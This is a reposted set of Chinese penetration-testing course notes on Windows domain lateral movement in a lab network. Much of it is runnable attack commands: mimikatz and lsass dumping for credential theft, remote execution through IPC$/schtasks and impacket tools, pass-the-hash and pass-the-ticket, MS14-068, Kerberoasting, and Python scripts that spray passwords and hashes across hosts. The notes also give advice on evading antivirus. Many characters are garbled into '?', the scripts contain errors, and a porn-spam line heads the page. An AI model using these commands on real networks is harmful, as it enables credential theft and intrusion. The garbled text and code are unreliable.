日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

内网安全“小迪安全课堂笔记”域横向

發布時間:2023/12/10 编程问答 49 豆豆
生活随笔 收集整理的這篇文章主要介紹了 内网安全“小迪安全课堂笔记”域横向 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

內網安全

  • 內網安全-域環境&工作組&局域網探針方案
    • 基本認知
      • 域環境與工作組的區別
    • 環境靶機
    • 案例 1-基本信息收集操作演示
    • 案例 2-網絡信息收集操作演示
    • 案例 3-用戶信息收集操作演示
    • 案例 4-憑據信息收集操作演示
      • 計算機用戶 HASH,明文獲取-mimikatz(win),mimipenguin(linux)
      • 計算機各種協議服務口令獲取-LaZagne(all),XenArmor(win)
    • 案例 5-探針主機域控架構服務操作演示
    • 涉及資源
  • 域橫向批量at&schtasks&impacket
    • 案例 1-橫向滲透明文傳遞 at&schtasks
    • 案例 2-橫向滲透明文 HASH 傳遞 atexec-impacket
    • 案例 3-橫向滲透明文 HASH 傳遞批量利用-綜合
    • 案例 4-橫向滲透明文 HASH 傳遞批量利用-升級版
  • 內網安全-域橫向 smb&wmi 明文或 hash 傳遞
    • 案例 1-Procdump+Mimikatz 配合獲取
    • 案例 2-域橫向移動 SMB 服務利用-psexec(官方三方),smbexec(三方)
    • 案例 3-域橫向移動 WMI 服務利用-cscript,wmiexec,wmic
    • 案例 4-域橫向移動以上服務 hash 批量利用-python 編譯 exe
    • 涉及資源:
  • 內網安全-域橫向 PTH&PTK&PTT 哈希票據傳遞
    • 案例 1-域橫向移動 PTH 傳遞-mimikatz
    • 案例 2-域橫向移動 PTK 傳遞-mimikatz
    • 案例 3-域橫向移動 PTT 傳遞-ms14068&kekeo&本地
    • 案例 4-國產 Ladon 內網殺器測試驗收
  • 域橫向CobaltStrike&SPN&RDP
    • 案例1-域橫向移動RDP傳遞-Mimikatz
    • 案例2-域橫向移動SPN服務,探針,請求,破解,重寫
    • 域橫向移動測試流程?把梭-CS初體驗
    • 涉及資源∶
  • 內網安全-域橫向內網漫游 Socks 代理隧道技術
    • 案例 1-內網穿透 Ngrok 測試演示-兩個內網通訊上線
    • 案例 2-內網穿透 Frp 自建跳板測試-兩個內網通訊上線
    • 案例 3-CFS 三層內網漫游安全測試演練-某 CTF 線下 2019
  • 內網安全-域橫向網絡&傳輸&應用層隧道技術
    • 案例 1-網絡傳輸應用層檢測連通性-檢測
    • 案例 2-網絡層 ICMP 隧道 ptunnel 使用-檢測,利用
    • 案例 3-傳輸層轉發隧道 Portmap 使用-檢測,利用(??????)
    • 案例 4-傳輸層轉發隧道 Netcat 使用-檢測,利用,功能
    • 案例 5-應用層 DNS 隧道配合 CS 上線-檢測,利用,說明
  • 域橫向 CS&MSF 聯動shell

內網安全-域環境&工作組&局域網探針方案

基本認知

DMZ,是英文“demilitarized zone”的縮寫,中文名稱為“隔離區”,也稱“非軍事化區”。它是為了解決安裝防火墻后外部網絡的訪問用戶不能訪問內部網絡服務器的問題,而設立的一個非安全系統與安全系統之間的緩沖區。該緩沖區位于企業內部網絡和外部網絡之間的小網絡區域內。在這個小網絡區域內可以放置一些必須公開的服務器設施,如企業Web服務器、FTP服務器和論壇等。另一方面,通過這樣一個DMZ區域,更加有效地保護了內部網絡。因為這種網絡部署,比起一般的防火墻方案,對來自外網的攻擊者來說又多了一道關卡。

域控制器DC就是域的管理服務器

域是windows下的一種統一化管理的方式,明確一點,一個電腦可以用多個賬號登錄,并且還可以本地用戶和域用戶兩種方式登錄,沒有域環境和有域環境的認證方式不同

域環境與工作組的區別

1、域和工作組適用的環境不同,域一般是用在比較大的網絡里,工作組則較小,在一個域中需要一臺類似服務器的計算機,叫域控服務器,其他電腦如果想互相訪問首先都是經過它的,但是工作組則不同,在一個工作組里的所有計算機都是對等的,也就是沒有服務器和客戶機之分的,但是和域一樣,如果一臺計算機想訪問其他計算機的話首先也要找到這個組中的一臺類似組控服務器,組控服務器不是固定的,以選舉的方式實現,它存儲著這個組的相關信息,找到這臺計算機后得到組的信息然后訪問。
2、工作組是一群計算機的集合,它僅僅是一個邏輯的集合,各自計算機還是各自管理的,你要訪問其中的計算機,還是要到被訪問計算機上來實現用戶驗證的。而域不同,域是一個有安全邊界的計算機集合,在同一個域中的計算機彼此之間已經建立了信任關系,在域內訪問其他機器,不再需要被訪問機器的許可了。
拓展資料
1、域英文叫DOMAIN——域(Domain)是Windows網絡中獨立運行的單位,域之間相互訪問則需要建立信任關系(即Trust Relation)。信任關系是連接在域與域之間的橋梁。當一個域與其他域建立了信任關系后,2個域之間不但可以按需要相互進行管理,還可以跨網分配文件和打印機等設備資源,使不同的域之間實現網絡資源的共享與管理。
2、工作組(Work Group)是局域網中的一個概念。它是最常見最簡單最普通的資源管理模式,就是將不同的電腦按功能分別列入不同的組中,以方便管理。

環境靶機

案例 1-基本信息收集操作演示

旨在了解當前服務器的計算機基本信息,為后續判斷服務器角色,網絡環境等做準備。
systeminfo 詳細信息
net start 啟動服務
tasklist 進程列表
schtasks 計劃任務

systeminfo 詳細信息

net start 啟動服務,可以大致判斷當前服務器在域內扮演什么角色。

tasklist 進程列表

schtasks 計劃任務,這里加載不出來,權限不夠,需要提權。

案例 2-網絡信息收集操作演示

旨在了解當前服務器的網絡接口信息,為判斷當前角色,功能,網絡架構做準備
ipconfig /all 判斷存在域-dns
net view /domain 判斷存在域
net time /domain 判斷主域
netstat -ano 當前網絡端口開放
nslookup 域名 追蹤來源地址

旨在了解當前服務器的?絡接?信息,為判斷當前??,功能,?絡架構做準備
ipconfig /all 判斷存在域-dns
有域

沒有域

net view /domain 判斷存在域

net time /domain 判斷主域(域控)

獲得?個計算機名字,我們可以通過ping命令來獲取IP地址

netstart -ano 當前主機?絡端?開放,判斷角色

查看主機名,也可能判斷角色

nslookup 域名 追蹤來源地址

案例 3-用戶信息收集操作演示

旨在了解當前計算機或域環境下的用戶及用戶組信息,便于后期利用憑據進行測試
系統默認常見用戶身份:

Domain Admins:域管理員(默認對域控制器有完全控制權)
Domain Computers:域內機器
Domain Controllers:域控制器
Domain Guest:域訪客,權限低
Domain Users:域用戶
Enterprise Admins:企業系統管理員用戶(默認對域控制器有完全控制權)
主要針對Domain Admins/Enterprise Admins

相關用戶收集操作命令:

whoami /all 用戶權限
net config workstation 登錄信息
net user 本地用戶
net localgroup 本地用戶組
net user /domain 獲取域用戶信息
net group /domain 獲取域用戶組信息
wmic useraccount get /all 涉及域用戶詳細信息
net group “Domain Admins” /domain 查詢域管理員賬戶
net group “Enterprise Admins” /domain 查詢管理員用戶組
net group “Domain Controllers” /domain 查詢域控制器

域用戶與本地用戶的區別?

net user查看本地用戶,net user domain查看域用戶

GOD\webadmin(域用戶)進行計算機管理操作時,需要驗證賬號密碼才能操作,這個就是因為AD?錄來操控的,域成員主機權限不夠。

切換至administrator本地用戶,可以直接操作。現在?的是??的賬號,??域賬號。

相關?戶收集操作命令:
Whoami /all ?戶權限
net config workstation 登錄信息
net user 本地信息

net localgroup 本地?戶組

net user /domain 獲取域?戶信息

net group /domain 獲取域?戶組信息

wmic useraccount get /all 涉及域?戶詳細信息

net group “Domain Admins” /domain 查詢域管理員賬戶

通過這些收集,我們可以得到域?戶名,如果再得到密碼,就可以登錄操控了

案例 4-憑據信息收集操作演示

旨在收集各種密文,明文,口令等,為后續橫向滲透做好測試準備

計算機用戶 HASH,明文獲取-mimikatz(win),mimipenguin(linux)

上傳mimikatz到當前服務器

當前用戶是GOD\webadmin,是?法運?的,權限不?,權限提升。
提權后執行成功

獲取明文密碼和hash

mimipenguin(Linux)只?持部分Linux,同樣也需要高權限用戶執行

計算機各種協議服務口令獲取-LaZagne(all),XenArmor(win)

Netsh WLAN show profiles
Netsh WLAN show profile name=“無線名稱” key=clear
1.站點源碼備份文件、數據庫備份文件等
2.各類數據庫 Web 管理入口,如 PHPMyAdmin
3.瀏覽器保存密碼、瀏覽器 Cookies
4.其他用戶會話、3389 和 ipc$連接記錄、回收站內容
5.Windows 保存的 WIFI 密碼
6.網絡內部的各種帳號和密碼,如:Email、VPN、FTP、OA 等

LaZagne(all)?持全系統,但垃圾
上傳運行
XenArmor(win)
上傳后執行

其他軟件需要配置環境路徑
結果,此為免費版本,付費可查看完整密碼,也可找破解版。

獲取的這些密碼可作為爆破字典,內網中大多密碼重復使用幾率都比較高。

案例 5-探針主機域控架構服務操作演示

為后續橫向思路做準備,針對應用,協議等各類攻擊手法
探針域控制器名及地址信息
net time /domain nslookup ping
探針域內存活主機及地址信息
nbtscan 192.168.3.0/24 第三方工具

?個?牌?具,既不免殺,還得下載

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr “TTL=” 自帶內部命令-推薦

?帶內部命令,不?免殺,缺點,顯示內容沒有那麼多,只有?標的地址

nmap masscan 第三方 PowerShell 腳本 nishang empire 等

使?第三?的?具掃描可能會被監控到,從?被攔截
nishang舉例:已上傳到服務器
#導入模塊 nishang
Import-Module .\nishang.psm1

#設置執行策略 ,解決上圖報錯
Set-ExecutionPolicy RemoteSigned


#獲取模塊 nishang 的命令函數
Get-Command -Module nishang

#獲取常規計算機信息
Get-Information

#端口掃描(查看目錄對應文件有演示語法,其他同理)
Invoke-PortScan -StartAddress 192.168.3.0 -EndAddress 192.168.3.100 -ResolveHost -ScanPort

#其他功能:刪除補丁,反彈 Shell,憑據獲取等
探針域內主機角色及服務信息
利用開放端口服務及計算機名判斷
核心業務機器:
1.高級管理人員、系統管理員、財務/人事/業務人員的個人計算機
2.產品管理系統服務器
3.辦公系統服務器
4.財務應用系統服務器
5.核心產品源碼服務器(自建 SVN、GIT)
6.數據庫服務器
7.文件或網盤服務器、共享服務器
8.電子郵件服務器
9.網絡監控系統服務器
10.其他服務器(內部技術文檔服務器、其他監控服務器等)

涉及資源

http://unixwiz.net/tools/nbtscan.html
https://github.com/samratashok/nishang
https://github.com/AlessandroZ/LaZagne
https://github.com/gentilkiwi/mimikatz/releases
https://github.com/huntergregal/mimipenguin/releases/
https://nagareshwar.securityxploded.com/download-softwares/
https://xenarmor.com/allinone-password-recovery-pro-software/
https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug提取碼:taqu

域橫向批量at&schtasks&impacket

傳遞攻擊是建?在明?和hash獲取介質上的?種攻擊。

2008 r2 webserver 域內 web 服務器 本地管理員賬號密碼 : .\administraotr:admin!@#45 當前機器域用戶密碼 : god\webadmin:admin!@#45 ------------------------------------- 2003 x86 fileserver 域內文件服務器 本地管理員賬號密碼 : administrator : admin 當前機器域用戶密碼 : god\fileadmin : Admin12345 ------------------------------------- 2008 r2 x64 dc god.org 主域控機器 域管賬號密碼: God\administrator : Admin12345 ------------------------------------- 2012 sqlserver 域內數據庫服務器 本地管理員賬號密碼 : .\administrator:admin!@#45 當前機器域用戶密碼 : god\dbadmin:admin!@#45 ------------------------------------- w7 x64 mary-pc 域內個人機 本地管理員賬號密碼 : .\mary : admin 當前機器域用戶密碼 : god\mary : admin!@#45 ------------------------------------- w8.1 x64 jack-pc 域內個人機 本地管理員賬號密碼 : .\jack : admin 當前機器域用戶密碼 : god\boss : Admin12345

案例 1-橫向滲透明文傳遞 at&schtasks

**在拿下一臺內網主機后,通過本地信息搜集收集用戶憑證等信息后,如何橫向滲透拿下更多的主機?**這里僅介紹 at&schtasks 命令的使用,在已知目標系統的用戶明文密碼的基礎上,直接可以在遠程主機上執行命令。
獲取到某域主機權限->minikatz 得到密碼(明文,hash)->用到信息收集里面域用戶的列表當做用戶名字典->用到密碼明文當做密碼字典-》嘗試連接->創建計劃任務(at|schtasks)->執行文件可為后門或者相關命令。
利用流程

  • 建立 IPC 鏈接到目標主機
  • 拷貝要執行的命令腳本到目標主機
  • 查看目標時間,創建計劃任務(at、schtasks)定時執行拷貝到的腳本
  • 刪除 IPC 鏈接
  • net use \\server\ipc$"password" /user:username # 工作組 net use \\server\ipc$"password" /user:domain\username #域內 dir \\xx.xx.xx.xx\C$\ # 查看文件列表 copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下載文件 copy 1.bat \\xx.xx.xx.xx\C$ # 復制文件 net use \\xx.xx.xx.xx\C$\1.bat /del # 刪除 IPC net view xx.xx.xx.xx # 查看對方共享 #建立 IPC 常見的錯誤代碼 (1)5:拒絕訪問,可能是使用的用戶不是管理員權限,需要先提升權限 (2)51:網絡問題,Windows 無法找到網絡路徑 (3)53:找不到網絡路徑,可能是 IP 地址錯誤、目標未開機、目標 Lanmanserver 服務未啟動、有防火墻等問題 (4)67:找不到網絡名,本地 Lanmanworkstation 服務未啟動,目標刪除 ipc$ (5)1219:提供的憑據和已存在的憑據集沖突,說明已建立 IPC$,需要先刪除 (6)1326:賬號密碼錯誤 (7)1792:目標 NetLogon 服務未啟動,連接域控常常會出現此情況 (8)2242:用戶密碼過期,目標有賬號策略,強制定期更改密碼 #建立 IPC 失敗的原因 (1)目標系統不是 NT 或以上的操作系統 (2)對方沒有打開 IPC$共享 (3)對方未開啟 139、445 端口,或者被防火墻屏蔽 (4)輸出命令、賬號密碼有錯誤

    [at] & [schtasks] 都是基于定時任務的攻擊
    at < Windows2012

    net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # 建立 ipc 連接: copy add.bat \\192.168.3.21\c$ #拷貝執行文件到目標機器,(實戰中?多是CS或者MSF??) at \\192.168.3.21 15:47 c:\add.bat #添加計劃任務

    schtasks >=Windows2012

    net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator # 建立 ipc 連接:用戶需為本地用戶 copy add.bat \\192.168.3.32\c$ #復制文件到其 C 盤 schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #創建 adduser 任務對應執行文件 schtasks /run /s 192.168.3.32 /tn adduser /i #運行 adduser 任務 schtasks /delete /s 192.168.3.21 /tn adduser /f#刪除 adduser 任務



    案例 2-橫向滲透明文 HASH 傳遞 atexec-impacket

    impacket:https://gitee.com/RichChigga/impacket-examples-windows
    https://www.freebuf.com/sectool/175208.html # 參考文獻
    atexec是impacket其中的一個工具,還?帶提權。優點:?便快捷,可以?持hash。缺點:第三??具,會受到殺毒軟件或防護的影響。如果 ?標主機有殺軟或防護的話,要對該軟件進?免殺。

    atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami" #明文 atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami" atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami" #hash

    案例 3-橫向滲透明文 HASH 傳遞批量利用-綜合

    webServer已經拿到權限
    獲取密碼

    獲得本機密碼

    探針存活主機

    使?批處理來跑多個IP地址使?固定的密碼賬號,來執?個whoami,ips.txt就是剛才收集到存活主機 的IP地址

    通過返回信息來判斷能否連接

    192.168.3.29采?的是同密碼
    繼續拿下這個主機,重復之前操作。豐富密碼字典。
    之后拿密碼字典去攻擊域控

    FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量檢測 IP 對應明文連接 FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量檢測 IP 對應明文回顯版 FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量檢測明文對應 IP回顯版 FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量檢測HASH 對應 IP 回顯版

    ?戶名也可以變。以上bat缺點只有?個變量。可以?bat實現多變量,也可以使?python寫,然后使?第三?庫,打包成.exe

    案例 4-橫向滲透明文 HASH 傳遞批量利用-升級版

    承接案例3-python版

    net use \192.168.3.32\ipc$ admin!@#45 /user:god\dbadmin
    #pip install pyinstaller
    #pyinstaller -F fuck_neiwang_001.py ?成可執?EXE
    代碼:

    import os,time ips={'192.168.3.21','192.168.3.25', '192.168.3.29', '192.168.3.30', '1'} user = { 'Administrator', 'boss', 'dbadmin', 'fileadmin', 'mack','mary','vpnadm','webadmin'} passs = { 'admin', 'admin!@#45', 'Admin12345' } for ip in ips:for user in users: for mima in passs: exec = "net use \\"+"\\"+ip+"\ipc$ "+mina+" /user:god\\"+user print("----->"+exec+"<-----") os.system(exec) time.sleep(1)

    執行,這里的腳本源碼時單線程,可以做多線程等優化,運行更便捷。
    net use查看鏈接情況,

    內網安全-域橫向 smb&wmi 明文或 hash 傳遞

    知識點1:
    Windows2012以上版本默認關閉wdigest,攻擊者?法從內存中獲取明?密碼。這種情況mimkatz只能獲取hash。
    Windows2012以下版本如安裝KB2871997補丁,同樣也會導致?法獲取明?密碼
    針對以上情況,我們提供了4種?式解決此類問題
    1.利?哈希hash傳遞(pth,ptk等)進?移動
    2.利?其他服務協議(SMB,WMI等)進?哈希移動
    3.利?注冊表操作開啟Wdigest Auth值進?獲取
    4.利??具或第三?平臺(Hachcat)進?破解獲取

    Hashcat破解獲取Windows NTML
    Hash hashcat -a 0 -m 1000 file --force
    知識點2:
    Windows系統的LM HASH及NTLM Hash加密算法,個?系統在Windows vista后,服務器系統在 Windows 2003以后,認證?式均為NTLM Hash。

    案例 1-Procdump+Mimikatz 配合獲取

    procdump是Windows官?的?具
    如果上傳Minmiktz上傳后被殺,可以使?Procdump+Mimikatz這個?法 .

    procdump 配合 mimikatz
    procdump -accepteula -ma lsass.exe lsass.dmp
    mimikatz 上執行:
    sekurlsa::minidump lsass.dmp
    sekurlsa::logonPasswords full

    運?procdump在當前?錄下?成lsass.dmp?件

    然后再在mimi上使?命令還原出來密碼
    在?標主機上?proc?成?件,然后再在本地上?Mim還原出密碼
    mimikatz上執?:
    sekurlas::minidump lsass.dmp
    sekurlas::logonPasswords full
    能夠直接獲取明文-與mimikatz在服務器中運行結果一致。

    案例 2-域橫向移動 SMB 服務利用-psexec(官方三方),smbexec(三方)

    利用 SMB 服務可以通過明文或 hash 傳遞來遠程執行,條件 445 服務端口開放。
    psexec 第一種:先有 ipc 鏈接,psexec 需要明文或 hash 傳遞
    net use \192.168.3.32\ipc$ “admin!@#45” /user:administrator
    psexec \192.168.3.32 -s cmd # 需要先有 ipc 鏈接 -s 以 System 權限運行

    psexec 第二種:不用建立 IPC 直接提供明文賬戶密碼
    官方 Pstools 無法采用 hash 連接

    psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd psexec -hashes :$HASH$ ./administrator@10.1.2.3 psexec -hashes :$HASH$ domain/administrator@10.1.2.3 psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

    在官?下載pstools,上傳??標主機執行語句

    執?命令,將前期信息收集到的ip地址,?戶名 ,密碼,反彈回cmd

    基于Hash的:

    執?時出現了問題,解決需要?到?個?官?的庫impacket的psexec,官方的不支持hash

    反彈成功

    非官方自帶-參考 impacket 工具包使用,操作簡單,容易被殺

    smbexec 無需先 ipc 鏈接 明文或 hash 傳遞

    smbexec god/administrator:Admin12345@192.168.3.21 smbexec ./administrator:admin!@#45@192.168.3.32 smbexec -hashes :$HASH$ ./admin@192.168.3.21 smbbexec -hashes :$HASH$ domain/admin@192.168.3.21 smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21

    鏈接目標主機域用戶administrator

    鏈接目標主機本地用戶administrator

    案例 3-域橫向移動 WMI 服務利用-cscript,wmiexec,wmic

    WMI(Windows Management Instrumentation) 是通過 135 端口進行利用,支持用戶名明文或者 hash的方式進行認證,并且該方法不會在目標日志系統留下痕跡。
    自帶 WMIC 明文傳遞 無回顯

    wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"

    目標主機原本是沒有1.txt

    在當前主機上執?命令,等待連接

    連接完畢后,在?標主機上連接的那個域主機上出現了1.txt

    這個命令的弊端就是在當前主機沒有回顯,只有其他方式讀取目標主機生成的文件,比較尷尬。

    自帶 cscript 明文傳遞 有回顯

    cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

    需要借助?個wmiexec.vbs?件,在資源中有
    執?命令,反彈cmd

    套件 impacket wmiexec 明文或 hash 傳遞有回顯exe版本

    wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami" wmiexec god/administrator:Admin12345@192.168.3.21 "whoami" wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami" wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"


    案例 4-域橫向移動以上服務 hash 批量利用-python 編譯 exe

    pyinstaller.exe -F fuck_neiwang_002.py

    import os,time ips={'192.168.3.21','192.168.3.25','192.168.3.29','192.168.3.30','192.168.3.32' } users={'Administrator','boss','dbadmin','fileadmin','mack','mary','webadmin' } hashs={'ccef208c6485269c20db2cad21734fe7','518b98ad4178a53695dc997aa02d455c' } for ip in ips:for user in users:for mimahash in hashs:#wmiexec -hashes :hashgod/user@ipwhoamiexec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"print('--->' + exec + '<---')os.system(exec)time.sleep(0.5)

    涉及資源:

    https://github.com/hashcat/hashcat
    https://www.freebuf.com/sectool/164507.html
    https://github.com/gentilkiwi/mimikatz/releases
    https://github.com/SecureAuthCorp/impacket
    https://gitee.com/RichChigga/impacket-examples-windows
    https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
    https://docs.microsoft.com/zhcn/sysinternals/downloads/procdump
    https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw 提取碼:xiao

    內網安全-域橫向 PTH&PTK&PTT 哈希票據傳遞


    Kerberos 協議具體工作方法,在域中,簡要介紹一下:

    • 客戶機將明文密碼進行 NTLM 哈希,然后和時間戳一起加密(使用krbtgt 密碼 hash 作為密鑰),發送給 kdc(域控),kdc 對用戶進行檢測,成功之后創建 TGT(Ticket-Granting Ticket).
    • 將 TGT 進行加密簽名返回給客戶機器,只有域用戶 krbtgt 才能讀取 kerberos 中 TGT 數據
    • 然后客戶機將 TGT 發送給域控制器 KDC 請求 TGS(票證授權服務)票證,并且對 TGT 進行檢測
    • 檢測成功之后,將目標服務賬戶的 NTLM 以及 TGT 進行加密,將加密后的結果返回給客戶機。

    PTH(pass the hash) #利用 lm 或 ntlm 的值進行的滲透測試
    PTT(pass the ticket) #利用的票據憑證 TGT 進行的滲透測試 -基于Kerberos 協議
    PTK(pass the key) #利用的 ekeys aes256 進行的滲透測試

    PTH 在內網滲透中是一種很經典的攻擊方式,原理就是攻擊者可以直接通過 LM Hash 和 NTLM Hash訪問遠程主機或服務,而不用提供明文密碼。
    如果禁用了 ntlm 認證,PsExec 無法利用獲得的 ntlm hash 進行遠程連接,但是使用 mimikatz 還是可以攻擊成功。對于 8.1/2012r2,安裝補丁 kb2871997 的 Win 7/2008r2/8/2012 等,可以使用 AES keys代替 NT hash 來實現 ptk 攻擊,
    總結:KB2871997 補丁后的影響
    pth:沒打補丁用戶都可以連接,打了補丁只能 administrator 連接
    ptk:打了補丁才能用戶都可以連接,采用 aes256 連接
    https://www.freebuf.com/column/220740.html

    PTT 攻擊的部分就不是簡單的 NTLM 認證了,它是利用 Kerberos 協議進行攻擊的,這里就介紹三種常見的攻擊方法:MS14-068,Golden ticket,SILVER ticket,簡單來說就是將連接合法的票據注入到內存中實現連接。
    MS14-068 基于漏洞,Golden ticket(黃金票據),SILVER ticket(白銀票據)
    其中 Golden ticket(黃金票據),SILVER ticket(白銀票據)屬于權限維持技術
    MS14-068 造成的危害是允許域內任何一個普通用戶,將自己提升至域管權限。微軟給出的補丁是kb3011780

    案例 1-域橫向移動 PTH 傳遞-mimikatz

    mimikatz不僅可以獲取明文等信息,也可以進行pth等相關的攻擊。

    嚴謹?點,LM和NTML最好都收集
    下?這個命令是獲取aes256加密的


    PTH ntlm 傳遞
    未打補丁下的工作組及域連接:

    sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 \\OWA2010CN-God.god.org

    先嘗試攻擊域控主機

    直接連接域控主機是?法連接的

    使?mimikatz進?攻擊

    攻擊命令上并沒有指定IP地址,這是?種隨機攻擊,IP地址是前期信息收集的,連接時,可以遍歷IP地址, 看哪個有回顯。
    攻擊成功反彈回來了?個cmd,在這個cmd中進?連接。

    如果IP地址不識別,就換成計算機名
    之后就和at schtasks?樣了,復制?件,執??件等 攻擊另外?臺主機


    這?domain是?個?作組,直接連接到了主機的本地的Administrator

    案例 2-域橫向移動 PTK 傳遞-mimikatz


    PTK aes256 傳遞 - 必須打補丁才能使用
    打補丁后的工作組及域連接:

    sekurlsa::ekeys #獲取 aes sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b


    彈出?個cmd窗?,嘗試連接域內主機

    案例 3-域橫向移動 PTT 傳遞-ms14068&kekeo&本地

    第一種利用漏洞:
    能實現普通用戶直接獲取域控 system 權限
    MS14-068 powershell 執行
    1.查看當前 sid whoami/user
    2.mimikatz # kerberos::purge//清空當前機器中所有憑證,如果有域成員憑證會影響憑證偽造
    mimikatz # kerberos::list //查看當前機器憑證
    mimikatz # kerberos::ptc 票據文件 //將票據注入到內存中
    3.利用 ms14-068 生成 TGT 數據
    ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼
    MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 - p admin!@#45
    4.票據注入內存
    mimikatz.exe “kerberos::ptc TGT_mary@god.org.ccache” exit
    5.查看憑證列表 klist
    6.利用 dir \192.168.3.21\c$

    演示
    域內主機


    記錄下sid值,
    在域內主機mary上執?

    ?成TGT_mary@god.org.ccache

    查看mary內與那些主機有鏈接產?的票據

    為了防?影響我們的操作,刪除已有的票據

    ?mimi導?票據到內存,并且查看是否導?成功


    連接域控主機

    ?IP地址連接錯誤,?計算機名

    第二種利用工具 kekeo
    1.生成票據

    kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"


    2.導入票據

    kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi

    3.查看憑證 klist

    4.利用 net use 載入
    dir \192.168.3.21\c$
    第三種利用本地票據(需管理權限)
    前提是當前主機與目標主機10小時內連接過,就存在票據。

    sekurlsa::tickets /export kerberos::ptt xxxxxxxxxx.xxxx.kirbi

    總結:ptt 傳遞不需本地管理員權限,連接時主機名連接,基于漏洞,工具,本地票據

    導出票據后,會導出到你當前執??錄,收集好票據
    缺陷:ptt只能保持10個?時,如果能拿到10個?時內的憑據,可以成功


    導?成功

    案例 4-國產 Ladon 內網殺器測試驗收

    信息收集-協議掃描-漏洞探針-傳遞攻擊等

    我們打開Ladon的gui版本

    掃描時,選擇的時OnlinePC(存活主機),會嘗試獲取存活主機
    ?命令?形式執?掃描存活主機

    域橫向CobaltStrike&SPN&RDP



    cs教程:https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf

    案例1-域橫向移動RDP傳遞-Mimikatz

    除了上述講到的IPC,WMI,SMB等協議的鏈接外,獲取到的明?密碼或HASH密?也可以通過、RDP協議 進?鏈接操作。
    RDP協議連接:判斷對?遠程桌?是否開啟(3389端?)

    RDP明?密碼鏈接

    Windows:mstsc mstsc.exe /console /v192.168.3.21 /admin linux:rdesktop 192.168.3.21:3389

    RDP密文HASH鏈接

    windows Server需要開啟 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默認開啟,同時如果Win 7 和windows Server 2008 R2安裝了2871997、2973351補丁也支持; 開啟命令∶ REG ADD"HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_ DWORD /d 00000000 /f 開啟后運行∶ mstsc.exe /restrictedatmin mimikatZ.exe privilege::debug sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"

    案例2-域橫向移動SPN服務,探針,請求,破解,重寫

    https://www.cnblogs.com/backlion/p/8082623.htmo

    探針:spn查詢是普通Kerberos票據的一部分的一部分,不會被防火墻等設備攔截。
    spn只支持域內用戶,不支持本地用戶

    setspn -q */* setspn -q */* | finder "MSSQL"


    固定查找

    請求:

    Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx" mimikatz.exe "kerberos::ask /target:xxxx"


    導出

    mimikatz.exe "kerberos::ask /target:xxxxx"

    ?mimi導出剛才請求?成的票據,默認導出到mimi的目錄下

    破解

    破解得到?個密碼Admin12345

    域控主機的環境信息

    發現的確獲得sqlserver密碼
    重寫

    再將票據注入內存,進行之后操作。

    域橫向移動測試流程?把梭-CS初體驗

    此案例還原完整內網滲透流程
    環境:cs部署到了外網服務器。目標域還是本機這幾臺虛擬機。


    ?概流程:
    啟動-配置-監聽-執?-上線-提權-信息收集(?絡,憑證,定位等)-滲透
    1.關于啟動及配置講解
    2.關于提權及插件加載
    3.關于信息收集命令講解
    4.關于視圖?動化功能講解

    客戶端連接團隊服務器

    啟動團隊服務器,設定密碼,密碼再客戶端連接時要驗證
    點擊客戶端連接
    進?到了CS界?

    配置監聽器可以區分那個是??的,監聽器就是配置?個??傳輸的管道
